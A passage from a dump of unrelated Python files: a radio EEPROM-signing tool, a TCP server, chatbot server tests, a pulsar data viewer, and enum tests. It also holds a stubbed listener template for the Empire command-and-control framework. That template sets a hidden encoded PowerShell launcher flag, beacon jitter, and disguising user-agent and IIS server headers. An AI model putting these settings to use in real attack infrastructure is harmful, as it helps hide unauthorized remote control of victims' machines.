"+str(rnode.max_freq/1e6)+" MHz") RNS.log("\tMax TX power:\t\t"+str(rnode.max_output)+" dBm") RNS.log("\tManufactured:\t\t"+timestring) if rnode.configured: rnode.bandwidth = rnode.conf_bandwidth rnode.r_bandwidth = rnode.conf_bandwidth rnode.sf = rnode.conf_sf rnode.r_sf = rnode.conf_sf rnode.cr = rnode.conf_cr rnode.r_cr = rnode.conf_cr rnode.updateBitrate() txp_mw = round(pow(10, (rnode.conf_txpower/10)), 3) RNS.log("\tDevice signature:\t"+sigstring) RNS.log(""); RNS.log("\tDevice mode:\t\tTNC") RNS.log("\t Frequency:\t\t"+str((rnode.conf_frequency/1000000.0))+" MHz") RNS.log("\t Bandwidth:\t\t"+str(rnode.conf_bandwidth/1000.0)+" KHz") RNS.log("\t TX power:\t\t"+str(rnode.conf_txpower)+" dBm ("+str(txp_mw)+" mW)") RNS.log("\t Spreading factor:\t"+str(rnode.conf_sf)) RNS.log("\t Coding rate:\t\t"+str(rnode.conf_cr)) RNS.log("\t On-air bitrate:\t"+str(rnode.bitrate_kbps)+" kbps") else: RNS.log("\tDevice mode:\t\tNormal (host-controlled)") RNS.log("\tDevice signature:\t"+sigstring) print("") exit() else: RNS.log("EEPROM is invalid, no further information available") exit() if args.rom: if rnode.provisioned: RNS.log("EEPROM bootstrap was requested, but a valid EEPROM was already present.") RNS.log("No changes are being made.") exit() else: os.makedirs("./firmware", exist_ok=True) counter = None counter_path = "./firmware/serial.counter" try: if os.path.isfile(counter_path): file = open(counter_path, "r") counter_str = file.read() counter = int(counter_str) file.close() else: counter = 0 except Exception as e: RNS.log("Could not create device serial number, exiting") RNS.log(str(e)) exit() serialno = counter+1 model = None hwrev = None if args.model == "a4": model = ROM.MODEL_A4 if args.model == "a9": model = ROM.MODEL_A9 if args.hwrev != None and (args.hwrev > 0 and args.hwrev < 256): hwrev = chr(args.hwrev) if serialno > 0 and model != None and hwrev != None: try: from cryptography.hazmat.primitives import hashes from cryptography.hazmat.backends import 
default_backend timestamp = int(time.time()) time_bytes = struct.pack(">I", timestamp) serial_bytes = struct.pack(">I", serialno) file = open(counter_path, "w") file.write(str(serialno)) file.close() info_chunk = b"" + bytes([ROM.PRODUCT_RNODE, model, ord(hwrev)]) info_chunk += serial_bytes info_chunk += time_bytes digest = hashes.Hash(hashes.MD5(), backend=default_backend()) digest.update(info_chunk) checksum = digest.finalize() RNS.log("Loading signing key...") signature = None key_path = "./firmware/signing.key" if os.path.isfile(key_path): try: file = open(key_path, "rb") private_bytes = file.read() file.close() private_key = serialization.load_der_private_key( private_bytes, password=None, backend=default_backend() ) public_key = private_key.public_key() public_bytes = public_key.public_bytes( encoding=serialization.Encoding.DER, format=serialization.PublicFormat.SubjectPublicKeyInfo ) signature = private_key.sign( checksum, padding.PSS( mgf=padding.MGF1(hashes.SHA256()), salt_length=padding.PSS.MAX_LENGTH ), hashes.SHA256() ) except Exception as e: RNS.log("Error while signing EEPROM") RNS.log(str(e)) else: RNS.log("No signing key found") exit() RNS.log("Bootstrapping device EEPROM...") rnode.write_eeprom(ROM.ADDR_PRODUCT, ROM.PRODUCT_RNODE) time.sleep(0.006) rnode.write_eeprom(ROM.ADDR_MODEL, model) time.sleep(0.006) rnode.write_eeprom(ROM.ADDR_HW_REV, ord(hwrev)) time.sleep(0.006) rnode.write_eeprom(ROM.ADDR_SERIAL, serial_bytes[0]) time.sleep(0.006) rnode.write_eeprom(ROM.ADDR_SERIAL+1, serial_bytes[1]) time.sleep(0.006) rnode.write_eeprom(ROM.ADDR_SERIAL+2, serial_bytes[2]) time.sleep(0.006) rnode.write_eeprom(ROM.ADDR_SERIAL+3, serial_bytes[3]) time.sleep(0.006) rnode.write_eeprom(ROM.ADDR_MADE, time_bytes[0]) time.sleep(0.006) rnode.write_eeprom(ROM.ADDR_MADE+1, time_bytes[1]) time.sleep(0.006) rnode.write_eeprom(ROM.ADDR_MADE+2, time_bytes[2]) time.sleep(0.006) rnode.write_eeprom(ROM.ADDR_MADE+3, time_bytes[3]) time.sleep(0.006) for i in range(0,16): 
rnode.write_eeprom(ROM.ADDR_CHKSUM+i, checksum[i]) time.sleep(0.006) for i in range(0,128): rnode.write_eeprom(ROM.ADDR_SIGNATURE+i, signature[i]) time.sleep(0.006) rnode.write_eeprom(ROM.ADDR_INFO_LOCK, ROM.INFO_LOCK_BYTE) RNS.log("EEPROM written! Validating...") rnode.download_eeprom() if rnode.provisioned: RNS.log("EEPROM Bootstrapping successful!") try: os.makedirs("./firmware/device_db/", exist_ok=True) file = open("./firmware/device_db/"+serial_bytes.hex(), "wb") written = file.write(rnode.eeprom) file.close() except Exception as e: RNS.log("WARNING: Could not backup device EEPROM to disk") exit() else: RNS.log("EEPROM was written, but validation failed. Check your settings.") exit() except Exception as e: RNS.log("An error occurred while writing EEPROM. The contained exception was:") RNS.log(str(e)) raise e else: RNS.log("Invalid data specified, cancelling EEPROM write") exit() if rnode.provisioned: if args.normal: rnode.setNormalMode() RNS.log("Device set to normal (host-controlled) operating mode") exit() if args.tnc: if not (args.freq and args.bw and args.txp and args.sf and args.cr): RNS.log("Please input startup configuration:") print("") if args.freq: rnode.frequency = args.freq else: print("Frequency in Hz:\t", end="") rnode.frequency = int(input()) if args.bw: rnode.bandwidth = args.bw else: print("Bandwidth in Hz:\t", end="") rnode.bandwidth = int(input()) if args.txp != None and (args.txp >= 0 and args.txp <= 17): rnode.txpower = args.txp else: print("TX Power in dBm:\t", end="") rnode.txpower = int(input()) if args.sf: rnode.sf = args.sf else: print("Spreading factor:\t", end="") rnode.sf = int(input()) if args.cr: rnode.cr = args.cr else: print("Coding rate:\t\t", end="") rnode.cr = int(input()) print("") rnode.initRadio() sleep(0.5) rnode.setTNCMode() RNS.log("Device set to TNC operating mode") sleep(1.0) exit() else: RNS.log("This device contains a valid firmware, but EEPROM is invalid.") RNS.log("Probably the device has not been initialised, 
or the EEPROM has been erased.") RNS.log("Please correctly initialise the device and try again!") else: print("") parser.print_help() print("") exit() except KeyboardInterrupt: print("") exit() if __name__ == "__main__": main()
tcp_server.py
### # TCP server use multi thread example. # # License - MIT. ### import os import time import socket from threading import Thread # Thread. def thread_function(sock, addr): # { sock.send(b'Connected') while True: data = sock.recv(1024) if not data or 'exit' == data.decode('utf-8'): break sock.send(b'OK') print(data.decode('utf-8')) time.sleep(1) sock.close() print('Client %s:%s exit.' % addr) # } # Main function. def main(): # { # Create socket. sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # Get host ip address. host_name = socket.gethostname() host_ip = socket.gethostbyname(host_name) # Binding port, default max 65535. # Use host ip or 127.0.0.1 sock.bind((host_ip, 65532)) # Listen port. sock.listen(8) print('TCP Server running...') # Accept. while True: sck, addr = sock.accept() print('Client %s:%s connect.' % addr) # Create sub thread. thrd = Thread(target = thread_function, args = (sck, addr)) thrd.start() # } # Program entry. if '__main__' == __name__: main()
test_server.py
# -*- coding: utf-8 -*-
# Integration tests for the rasa_nlu HTTP server: each test talks to a live
# server instance started by the http_server fixture.
import pytest
import requests
import os
from rasa_nlu.server import RasaNLUServer
from rasa_nlu.config import RasaNLUConfig
from multiprocessing import Process
import time
import json
import codecs


class ResponseTest():
    # Value object pairing a server endpoint with its expected JSON response
    # (and an optional POST payload).
    def __init__(self, endpoint, expected_response, payload=None):
        self.endpoint = endpoint
        self.expected_response = expected_response
        self.payload = payload


@pytest.fixture
def http_server():
    # Start a RasaNLU server in a background process and yield its base URL;
    # the process is terminated after the test.
    def url(port):
        return "http://localhost:{0}".format(port)
    # basic conf
    _config = {
        'write': os.path.join(os.getcwd(), "rasa_nlu_logs.json"),
        'port': 5022,
        "backend": "mitie",
        "path": "./",
        "data": "./data/demo-restaurants.json",
        "emulate": "wit"
    }
    config = RasaNLUConfig(cmdline_args=_config)
    # run server in background
    server = RasaNLUServer(config)
    p = Process(target=server.start)
    p.daemon = True
    p.start()
    # TODO: implement better way to notify when server is up
    time.sleep(2)
    yield url(config.port)
    p.terminate()


def test_root(http_server):
    # The root endpoint answers with a plain "hello".
    req = requests.get(http_server)
    ret = req.text
    assert req.status_code == 200 and ret == "hello"


def test_status(http_server):
    # /status reports training state and available models.
    req = requests.get(http_server + "/status")
    ret = req.json()
    assert req.status_code == 200 and ("training" in ret and "available_models" in ret)


def test_get_parse(http_server):
    # GET /parse with query strings, including a non-ASCII input.
    tests = [
        ResponseTest(
            u"/parse?q=hello",
            [{u"entities": {}, u"confidence": 1.0, u"intent": u"greet", u"_text": u"hello"}]
        ),
        ResponseTest(
            u"/parse?q=hello ńöñàśçií",
            [{u"entities": {}, u"confidence": 1.0, u"intent": u"greet", u"_text": u"hello ńöñàśçií"}]
        ),
    ]
    for test in tests:
        req = requests.get(http_server + test.endpoint)
        assert req.status_code == 200 and req.json() == test.expected_response


def test_post_parse(http_server):
    # POST /parse with JSON payloads, including a non-ASCII input.
    tests = [
        ResponseTest(
            u"/parse",
            [{u"entities": {}, u"confidence": 1.0, u"intent": u"greet", u"_text": u"hello"}],
            payload={u"q": u"hello"}
        ),
        ResponseTest(
            u"/parse",
            [{u"entities": {}, u"confidence": 1.0, u"intent": u"greet", u"_text": u"hello ńöñàśçií"}],
            payload={u"q": u"hello ńöñàśçií"}
        ),
    ]
    for test in tests:
        req = requests.post(http_server + test.endpoint, json=test.payload)
        assert req.status_code == 200 and req.json() == test.expected_response


def test_post_train(http_server):
    # NOTE(review): this posts training data to /parse — presumably it should
    # target a /train endpoint; confirm against the server's API.
    train_data = json.loads(codecs.open('data/examples/luis/demo-restaurants.json', encoding='utf-8').read())
    req = requests.post(http_server + "/parse", json=train_data)
    assert req.status_code == 200
template.py
import base64
import random

# Empire imports
from lib.common import helpers
from lib.common import agents
from lib.common import encryption
from lib.common import packets
from lib.common import messages


class Listener:
    # Skeleton Empire listener module (Python 2). Copy this template and
    # implement the stubbed generate_*/start/shutdown methods to create a
    # working listener.

    def __init__(self, mainMenu, params=[]):
        # NOTE(review): mutable default `params=[]` is shared across calls;
        # it is unused here, but confirm before relying on it.
        self.info = {
            'Name': 'Template',
            'Author': ['@harmj0y'],
            'Description': ("Listener template"),
            # categories - client_server, peer_to_peer, broadcast, third_party
            'Category' : ('client_server'),
            'Comments': []
        }

        # any options needed by the stager, settable during runtime
        self.options = {
            # format:
            #   value_name : {description, required, default_value}
            'Name' : {'Description' : 'Name for the listener.', 'Required' : True, 'Value' : 'http'},
            'Host' : {'Description' : 'Hostname/IP for staging.', 'Required' : True, 'Value' : "http://%s:%s" % (helpers.lhost(), 80)},
            'BindIP' : {'Description' : 'The IP to bind to on the control server.', 'Required' : True, 'Value' : '0.0.0.0'},
            'Port' : {'Description' : 'Port for the listener.', 'Required' : True, 'Value' : 80},
            'Launcher' : {'Description' : 'Launcher string.', 'Required' : True, 'Value' : 'powershell -noP -sta -w 1 -enc '},
            'StagingKey' : {'Description' : 'Staging key for initial agent negotiation.', 'Required' : True, 'Value' : '2c103f2c4ed1e59c0b4e2e01821770fa'},
            'DefaultDelay' : {'Description' : 'Agent delay/reach back interval (in seconds).', 'Required' : True, 'Value' : 5},
            'DefaultJitter' : {'Description' : 'Jitter in agent reachback interval (0.0-1.0).', 'Required' : True, 'Value' : 0.0},
            'DefaultLostLimit' : {'Description' : 'Number of missed checkins before exiting', 'Required' : True, 'Value' : 60},
            'DefaultProfile' : {'Description' : 'Default communication profile for the agent.', 'Required' : True, 'Value' : "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"},
            'CertPath' : {'Description' : 'Certificate path for https listeners.', 'Required' : False, 'Value' : ''},
            'KillDate' : {'Description' : 'Date for the listener to exit (MM/dd/yyyy).', 'Required' : False, 'Value' : ''},
            'WorkingHours' : {'Description' : 'Hours for the agent to operate (09:00-17:00).', 'Required' : False, 'Value' : ''},
            'ServerVersion' : {'Description' : 'Server header for the control server.', 'Required' : True, 'Value' : 'Microsoft-IIS/7.5'},
            'StagerURI' : {'Description' : 'URI for the stager. Example: stager.php', 'Required' : False, 'Value' : ''},
            'UserAgent' : {'Description' : 'User-agent string to use for the staging request (default, none, or other).', 'Required' : False, 'Value' : 'default'},
            'Proxy' : {'Description' : 'Proxy to use for request (default, none, or other).', 'Required' : False, 'Value' : 'default'},
            'ProxyCreds' : {'Description' : 'Proxy credentials ([domain\]username:password) to use for request (default, none, or other).', 'Required' : False, 'Value' : 'default'},
            'SlackToken' : {'Description' : 'Your SlackBot API token to communicate with your Slack instance.', 'Required' : False, 'Value' : ''},
            'SlackChannel' : {'Description' : 'The Slack channel or DM that notifications will be sent to.', 'Required' : False, 'Value' : '#general'}
        }

        # required:
        self.mainMenu = mainMenu
        self.threads = {} # used to keep track of any threaded instances of this server

        # optional/specific for this module

        # set the default staging key to the controller db default
        self.options['StagingKey']['Value'] = str(helpers.get_config('staging_key')[0])

    def default_response(self):
        """
        If there's a default response expected from the server that the client needs
        to ignore, (i.e. a default HTTP page), put the generation here.
        """
        print helpers.color("[!] default_response() not implemented for listeners/template")
        return ''

    def validate_options(self):
        """
        Validate all options for this listener.

        Returns False (and prints the offending option) if any required option
        has an empty value, True otherwise.
        """
        for key in self.options:
            if self.options[key]['Required'] and (str(self.options[key]['Value']).strip() == ''):
                print helpers.color("[!] Option \"%s\" is required." % (key))
                return False
        return True

    def generate_launcher(self, encode=True, obfuscate=False, obfuscationCommand="", userAgent='default', proxy='default', proxyCreds='default', stagerRetries='0', language=None, safeChecks='', listenerName=None):
        """
        Generate a basic launcher for the specified listener.

        Looks up the named active listener's options to build the staging URI,
        then dispatches on `language` ('powershell' or 'python'). The template
        returns empty launcher strings; real modules return launcher code.
        """
        if not language:
            print helpers.color('[!] listeners/template generate_launcher(): no language specified!')
            return None

        if listenerName and (listenerName in self.mainMenu.listeners.activeListeners):

            # extract the set options for this instantiated listener
            listenerOptions = self.mainMenu.listeners.activeListeners[listenerName]['options']
            host = listenerOptions['Host']['Value']
            stagingKey = listenerOptions['StagingKey']['Value']
            profile = listenerOptions['DefaultProfile']['Value']
            # first half of the profile is a comma-separated list of URIs
            uris = [a.strip('/') for a in profile.split('|')[0].split(',')]
            stage0 = random.choice(uris)
            launchURI = "%s/%s" % (host, stage0)

            if language.startswith('po'):
                # PowerShell
                return ''

            if language.startswith('py'):
                # Python
                return ''

            else:
                print helpers.color("[!] listeners/template generate_launcher(): invalid language specification: only 'powershell' and 'python' are current supported for this module.")

        else:
            print helpers.color("[!] listeners/template generate_launcher(): invalid listener name specification!")

    def generate_stager(self, listenerOptions, encode=False, encrypt=True, obfuscate=False, obfuscationCommand="", language=None):
        """
        If you want to support staging for the listener module, generate_stager must be
        implemented to return the stage1 key-negotiation stager code.
        """
        print helpers.color("[!] generate_stager() not implemented for listeners/template")
        return ''

    def generate_agent(self, listenerOptions, language=None, obfuscate=False, obfuscationCommand=""):
        """
        If you want to support staging for the listener module, generate_agent must be
        implemented to return the actual staged agent code.
        """
        print helpers.color("[!] generate_agent() not implemented for listeners/template")
        return ''

    def generate_comms(self, listenerOptions, language=None):
        """
        Generate just the agent communication code block needed for communications with this listener.

        This is so agents can easily be dynamically updated for the new listener.
        This should be implemented for the module.
        """
        if language:
            if language.lower() == 'powershell':

                updateServers = """
    $Script:ControlServers = @("%s");
    $Script:ServerIndex = 0;
""" % (listenerOptions['Host']['Value'])

                getTask = """
    $script:GetTask = {
    }
"""

                sendMessage = """
    $script:SendMessage = {
        param($Packets)

        if($Packets) {
        }
    }
"""

                return updateServers + getTask + sendMessage + "\n'New agent comms registered!'"

            elif language.lower() == 'python':
                # send_message()
                pass
            else:
                print helpers.color("[!] listeners/template generate_comms(): invalid language specification, only 'powershell' and 'python' are current supported for this module.")
        else:
            print helpers.color('[!] listeners/template generate_comms(): no language specified!')

    def start(self, name=''):
        """
        If a server component needs to be started, implement the kick off logic
        here and the actual server code in another function to facilitate threading
        (i.e. start_server() in the http listener).
        """
        # Reference implementation (kept for guidance):
        # listenerOptions = self.options
        # if name and name != '':
        #     self.threads[name] = helpers.KThread(target=self.start_server, args=(listenerOptions,))
        #     self.threads[name].start()
        #     time.sleep(1)
        #     # returns True if the listener successfully started, false otherwise
        #     return self.threads[name].is_alive()
        # else:
        #     name = listenerOptions['Name']['Value']
        #     self.threads[name] = helpers.KThread(target=self.start_server, args=(listenerOptions,))
        #     self.threads[name].start()
        #     time.sleep(1)
        #     # returns True if the listener successfully started, false otherwise
        #     return self.threads[name].is_alive()

        return True

    def shutdown(self, name=''):
        """
        If a server component was started, implement the logic that kills the particular
        named listener here.
        """
        # Reference implementation (kept for guidance):
        # if name and name != '':
        #     print helpers.color("[!] Killing listener '%s'" % (name))
        #     self.threads[name].kill()
        # else:
        #     print helpers.color("[!] Killing listener '%s'" % (self.options['Name']['Value']))
        #     self.threads[self.options['Name']['Value']].kill()

        pass
kvPeekTCP_reconn.py
# Live pulsar intensity-stream viewer: accepts one TCP connection from the
# intensity broadcaster, parses its handshake header, and animates a
# waterfall plus a folded pulse profile for the configured target pulsar.
# === Start Python 2/3 compatibility
from __future__ import absolute_import, division, print_function, unicode_literals
from future.builtins import *  # noqa  pylint: disable=W0401, W0614
from future.builtins.disabled import *  # noqa  pylint: disable=W0401, W0614
# === End Python 2/3 compatibility
from future import standard_library

standard_library.install_aliases()

import time
import threading
import socket
import sys
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.animation as animation
import matplotlib.dates as md
import datetime
import struct
import json

# Folded profiles divide by a count array that may contain zeros; silence
# the resulting divide/invalid warnings.
np.seterr(divide="ignore", invalid="ignore")

# target = 'B2111+46'
# target = 'B0329+54'
target = "B1133+16"

# Binary layout of the 48-byte handshake header (mirrors the C struct):
# struct IntensityHeader {
#     int packet_length;       // - packet length
#     int header_length;       // - header length
#     int samples_per_packet;  // - number of samples in packet (or dimensions, n_freq x n_time x n_stream?)
#     int sample_type;         // - data type of samples in packet
#     double raw_cadence;      // - raw sample cadence
#     int num_freqs;           // - freq list / map
#     int samples_summed;      // - samples summed for each datum
#     uint handshake_idx;      // - frame idx at handshake
#     double handshake_utc;    // - UTC time at handshake
#     char stokes_type;        // - description of stream (e.g. V / H pol, Stokes-I / Q / U / V)
#     //  -8 -7 -6 -5 -4 -3 -2 -1 1 2 3 4
#     //  YX XY YY XX LR RL LL RR I Q U V
# };
header_fmt = "=iiiidiiiId"
stokes_lookup = ["YX", "XY", "YY", "XX", "LR", "RL", "LL", "RR", "I", "Q", "U", "V"]

TCP_IP = "0.0.0.0"
TCP_PORT = 2054

# Listen for a single broadcaster connection.
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind((TCP_IP, TCP_PORT))
sock.listen(1)

# Pulsar parameters (e.g. spin frequency) for the fold come from a local catalog.
psrcat = json.load(open("psrcat/psrcat_b.json"))["pulsars"]
psrdata = psrcat[target]


def updatefig(*args):
    # Matplotlib animation callback: refresh the waterfall and folded-profile
    # images from the shared global arrays filled by the reader thread.
    # `medsub` toggles per-frequency median subtraction for display contrast.
    global waterfall, times, medsub, colorscale
    tmin = md.date2num(datetime.datetime.fromtimestamp(np.amin(times)))
    tmax = md.date2num(datetime.datetime.fromtimestamp(np.amax(times)))
    for i in np.arange(pkt_elems):
        if medsub:
            p[i].set_data(
                waterfall[:, :, i] - np.nanmedian(waterfall[:, :, i], axis=0)[np.newaxis, :]
            )
            # Fold is displayed in dB of the per-bin average (sum / count).
            tmpdata = 10 * np.log10(waterfold[:, :, i] / countfold[:, :, i])
            p[pkt_elems + i].set_data(
                tmpdata - np.median(tmpdata, axis=0)[np.newaxis, :]
            )
        else:
            p[i].set_data(waterfall[:, :, i])
            tmpdata = 10 * np.log10(waterfold[:, :, i] / countfold[:, :, i])
            p[pkt_elems + i].set_data(tmpdata)
        p[i].set_extent([freqlist[0, 0], freqlist[-1, -1], tmin, tmax])
        p[i].set_clim(vmin=colorscale[0], vmax=colorscale[1])
        p[pkt_elems + i].set_clim(vmin=colorscale[0] / 10, vmax=colorscale[1] / 10)
    return (p,)


def receive(connection, length):
    # Read exactly `length` bytes from `connection`, looping over short reads;
    # raises RuntimeError if the peer closes the socket early.
    chunks = []
    bytes_recd = 0
    while bytes_recd < length:
        chunk = connection.recv(min(length - bytes_recd, 2048))
        if chunk == b"":
            raise RuntimeError("socket connection broken")
        chunks.append(chunk)
        bytes_recd = bytes_recd + len(chunk)
    return b"".join(chunks)


# Block until the broadcaster connects, then read the fixed 48-byte handshake.
connection, client_address = sock.accept()
packed_header = receive(connection, 48)
print(len(packed_header), packed_header)

tcp_header = struct.unpack(header_fmt, packed_header)
pkt_length = tcp_header[0]  # packet_length
pkt_header = tcp_header[1]  # header_length
pkt_samples = tcp_header[2]  # samples_per_packet
pkt_dtype = tcp_header[3]  # sample_type
pkt_raw_cad = tcp_header[4]  # raw_cadence
pkt_freqs = tcp_header[5]  # num_freqs
pkt_elems = tcp_header[6]  # number of element/stokes streams (original comment said "num_freqs" — copy-paste slip)
pkt_int_len = tcp_header[7]  # samples_summed per datum by the sender
pkt_idx0 = tcp_header[8]  # handshake_idx: frame index at handshake
pkt_utc0 = tcp_header[9]  # handshake_utc: UTC timestamp at handshake
print(tcp_header)

# Wall-clock seconds spanned by one pre-integrated frame from the sender.
sec_per_pkt_frame = pkt_raw_cad * pkt_int_len

# Variable-length handshake part: per-channel (start, stop) float32 frequency
# pairs, then one int8 stokes/element code per stream.
info_header = receive(connection, pkt_freqs * 4 * 2 + pkt_elems * 1)
# NOTE(review): np.fromstring is deprecated for binary input; np.frombuffer
# is the direct replacement throughout this script.
freqlist = np.fromstring(info_header[: pkt_freqs * 4 * 2], dtype=np.float32).reshape(
    -1, 2
)  # .mean(axis=1)
freqlist = freqlist / 1e6  # presumably Hz -> MHz — confirm sender units
elemlist = np.fromstring(info_header[pkt_freqs * 4 * 2 :], dtype=np.int8)

plot_freqs = pkt_freqs // 8  # display resolution: 8x frequency downsample
# freqlist = freqlist.reshape(-1,plot_freqs).mean(axis=1)
plot_times = 256  # rows kept in the scrolling waterfall
plot_phase = 128  # phase bins in the folded pulse profile
total_integration = 1024 * 8  # desired raw samples per displayed row
if pkt_int_len > total_integration:
    # Sender already integrates longer than requested; display at its cadence.
    print("Pre-integrated to longer than desired time!")
    print("{} vs {}".format(pkt_int_len, total_integration))
    print("Resetting integration length to {}".format(pkt_int_len))
    total_integration = pkt_int_len
local_integration = total_integration // pkt_int_len  # frames summed per row

# Shared buffers: written by the data_listener() thread, read by updatefig().
waterfall = np.zeros((plot_times, plot_freqs, pkt_elems), dtype=np.float32) + np.nan
countfold = np.zeros((plot_phase, plot_freqs, pkt_elems), dtype=np.float32)
fold_period = 1.0 / psrdata["frequency"]  # pulsar spin period (seconds)
waterfold = np.zeros((plot_phase, plot_freqs, pkt_elems), dtype=np.float32)
times = np.zeros(plot_times)


def data_listener():
    """Background thread: consume data packets and fill the display buffers.

    Each outer iteration accumulates `local_integration` frames per stream
    into one new waterfall row, and folds the same samples into the pulse
    profile (waterfold/countfold) at the catalogue spin period.  On any
    exception (including a dropped connection) it blocks on accept() and
    re-reads the handshake headers.
    """
    global connection, sock
    global waterfall, waterfold, countfold
    global times, total_integration, pkt_idx0
    last_idx = pkt_idx0
    data_pkt_frame_idx = 0
    data_pkt_samples_summed = 1
    idx = 0  # NOTE(review): unused
    while True:
        try:
            d = np.zeros([pkt_freqs, pkt_elems])  # power accumulator
            n = np.zeros([pkt_freqs, pkt_elems])  # sample-count accumulator
            t = np.zeros(plot_times)  # NOTE(review): unused
            # Exponential decay so old pulses slowly fade out of the fold.
            waterfold *= 0.999
            countfold *= 0.999
            for i in np.arange(local_integration * pkt_elems):
                data = receive(connection, pkt_length + pkt_header)
                if len(data) != pkt_length + pkt_header:
                    print("Lost Connection!")
                    connection.close()
                    return
                # Per-packet header: frame index, element index, samples summed.
                data_pkt_frame_idx, data_pkt_elem_idx, data_pkt_samples_summed = struct.unpack(
                    "III", data[:pkt_header]
                )
                d[:, data_pkt_elem_idx] += (
                    np.fromstring(data[pkt_header:], dtype=np.uint32) * 1.0
                )
                n[:, data_pkt_elem_idx] += data_pkt_samples_summed * 1.0
                # Phase bin for this frame; +0.5*fold_period centers the pulse.
                fold_idx = np.array(
                    (
                        (sec_per_pkt_frame * data_pkt_frame_idx + 0.5 * fold_period)
                        % fold_period
                    )
                    / fold_period
                    * plot_phase,
                    dtype=np.int32,
                )
                waterfold[fold_idx, :, data_pkt_elem_idx] += (
                    np.fromstring(data[pkt_header:], dtype=np.uint32)
                    .reshape(-1, pkt_freqs // plot_freqs)
                    .mean(axis=1)
                )
                countfold[fold_idx, :, data_pkt_elem_idx] += data_pkt_samples_summed
            # Scroll by however many rows actually elapsed (handles drops).
            roll_idx = (data_pkt_frame_idx - last_idx) // local_integration
            times = np.roll(times, roll_idx)
            times[0] = sec_per_pkt_frame * (data_pkt_frame_idx - pkt_idx0) + pkt_utc0
            # print(d,n)
            waterfall = np.roll(waterfall, roll_idx, axis=0)
            # New row: mean power per downsampled channel, in dB.
            waterfall[0, :, :] = 10 * np.log10(
                (d / n).reshape(-1, pkt_freqs // plot_freqs, pkt_elems).mean(axis=1)
            )
            if np.mean(n) != total_integration:
                print(np.mean(n), np.std(n))
            last_idx = data_pkt_frame_idx
        # except socket.error, exc:
        # NOTE(review): bare except also swallows KeyboardInterrupt and real
        # bugs; catching socket.error/struct.error explicitly would be safer.
        except:
            connection, client_address = sock.accept()
            packed_header = receive(connection, 48)
            info_header = receive(connection, pkt_freqs * 4 * 2 + pkt_elems * 1)
            print("Reconnected!")


# Start the network reader, then give it a moment to fill some data.
thread = threading.Thread(target=data_listener)
thread.daemon = True
thread.start()
time.sleep(1)

# --- Figure layout: top row = waterfalls, bottom row = folded profiles. ---
f, ax = plt.subplots(2, pkt_elems, gridspec_kw={"height_ratios": [2, 1]})
f.subplots_adjust(right=0.8)
if pkt_elems == 1:
    ax = [ax]
plt.ioff()
p = []
tmin = md.date2num(
    datetime.datetime.fromtimestamp(
        pkt_utc0 - plot_times * local_integration * sec_per_pkt_frame
    )
)
tmax = md.date2num(datetime.datetime.fromtimestamp(pkt_utc0))
# Seed the time axis backwards from the handshake timestamp.
times = pkt_utc0 - np.arange(plot_times) * local_integration * sec_per_pkt_frame
date_format = md.DateFormatter("%H:%M:%S")
medsub = True  # start in median-subtracted display mode
colorscale = [-0.5, 0.5]  # dB color limits for the waterfall panels

for i in np.arange(pkt_elems):
    p.append(
        ax[0, i].imshow(
            waterfall[:, :, i],
            aspect="auto",
            animated=True,
            origin="upper",
            interpolation="nearest",
            cmap="gray",
            vmin=colorscale[0],
            vmax=colorscale[1],
            extent=[freqlist[0, 0], freqlist[-1, -1], tmin, tmax],
        )
    )
    ax[0, i].set_yticklabels([])
    ax[0, i].yaxis_date()

# NOTE(review): the two set_title calls assume pkt_elems >= 2, and the
# `ax = [ax]` fallback above would break ax[0, i] tuple-indexing for
# pkt_elems == 1 — confirm the expected stream count.
ax[0, 0].set_title(stokes_lookup[elemlist[0] + 8])
ax[0, 1].set_title(stokes_lookup[elemlist[1] + 8])
ax[0, 0].set_ylabel("Local Time")
ax[0, 0].yaxis_date()
ax[0, 0].yaxis.set_major_formatter(date_format)

for i in np.arange(pkt_elems):
    p.append(
        ax[1, i].imshow(
            waterfold[:, :, i],
            aspect="auto",
            animated=True,
            origin="upper",
            interpolation="nearest",
            cmap="gray",
            vmin=colorscale[0],
            vmax=colorscale[1],
            extent=[freqlist[0, 0], freqlist[-1, -1], 0, 1],
        )
    )
    ax[1, i].set_xlabel("Freq (MHz)")
ax[1, 0].set_ylabel("Pulse Phase")

# Shared colorbar for all panels.
cbar_ax = f.add_axes([0.85, 0.15, 0.05, 0.7])
c = f.colorbar(p[0], cax=cbar_ax)
c.set_label("Power (dB, arbitrary)")

from matplotlib.widgets import Slider, Button  # NOTE(review): Slider unused

rax = plt.axes([0.82, 0.03, 0.15, 0.04])
check = Button(rax, "Med Subtract")


def func(event):
    """Button callback: toggle median subtraction and rescale color limits."""
    global medsub, check, colorscale
    medsub = not medsub
    if medsub:
        check.label.set_text("Med Subtracted")
        colorscale = [-0.5, 0.5]
    else:
        check.label.set_text("Raw Power")
        colorscale = [-10, 10]


check.on_clicked(func)

ani = animation.FuncAnimation(f, updatefig, frames=100, interval=100)
f.show()
# ===== appended file: test_enum.py (CPython enum test suite) =====
import enum import inspect import pydoc import unittest from collections import OrderedDict from enum import Enum, IntEnum, EnumMeta, Flag, IntFlag, unique, auto from io import StringIO from pickle import dumps, loads, PicklingError, HIGHEST_PROTOCOL from test import support try: import threading except ImportError: threading = None try: class Stooges(Enum): LARRY = 1 CURLY = 2 MOE = 3 except Exception as exc: Stooges = exc try: class IntStooges(int, Enum): LARRY = 1 CURLY = 2 MOE = 3 except Exception as exc: IntStooges = exc try: class FloatStooges(float, Enum): LARRY = 1.39 CURLY = 2.72 MOE = 3.142596 except Exception as exc: FloatStooges = exc try: class FlagStooges(Flag): LARRY = 1 CURLY = 2 MOE = 3 except Exception as exc: FlagStooges = exc try: class StrEnum(str, Enum): """accepts only string values""" class Name(StrEnum): BDFL = 'Guido van Rossum' FLUFL = 'Barry Warsaw' except Exception as exc: Name = exc try: Question = Enum('Question', 'who what when where why', module=__name__) except Exception as exc: Question = exc try: Answer = Enum('Answer', 'him this then there because') except Exception as exc: Answer = exc try: Theory = Enum('Theory', 'rule law supposition', qualname= 'spanish_inquisition') except Exception as exc: Theory = exc try: class Fruit(Enum): TOMATO = 1 BANANA = 2 CHERRY = 3 except Exception: pass def test_pickle_dump_load(assertion, source, target=None): if target is None: target = source for protocol in range(HIGHEST_PROTOCOL + 1): assertion(loads(dumps(source, protocol=protocol)), target) def 